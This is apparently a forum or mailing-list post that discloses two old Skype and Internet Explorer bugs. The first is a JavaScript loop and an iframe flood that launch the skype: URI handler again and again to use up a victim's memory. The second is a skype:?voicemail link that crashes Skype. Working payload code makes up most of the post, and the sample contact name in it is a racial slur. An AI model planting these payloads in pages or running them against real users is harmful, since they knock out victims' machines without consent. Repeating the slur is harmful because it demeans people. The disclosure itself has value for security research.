1. Skype and Internet Explorer uri handler mechanism memory resources consumption bug:

<script>

for (var x = 1; x <= 666; x++)

{

popup_window = window.open('skype:happy_negro?call');

popup_window.close ();

}

</script>

This will invoke many skype.exe processes and as they are not closed - much memory will be consumed. Such script will be blocked by popup blocker, so it is possible to do it other way:

<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>

<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>

<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>

... I've used about megabyte of such crap

<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>

Tested on IE7, WinXP SP2 and skype 3.6.0.216

2. Unexploitable Skype null pointer dereference:

skype:?voicemail

To trigger the bug a right mouse button must be clicked, or menu button selected. Skype should crash :)

Found here: http://www.critical.lt/?opinions/show/1433

credits: Critical Security

[ reply ]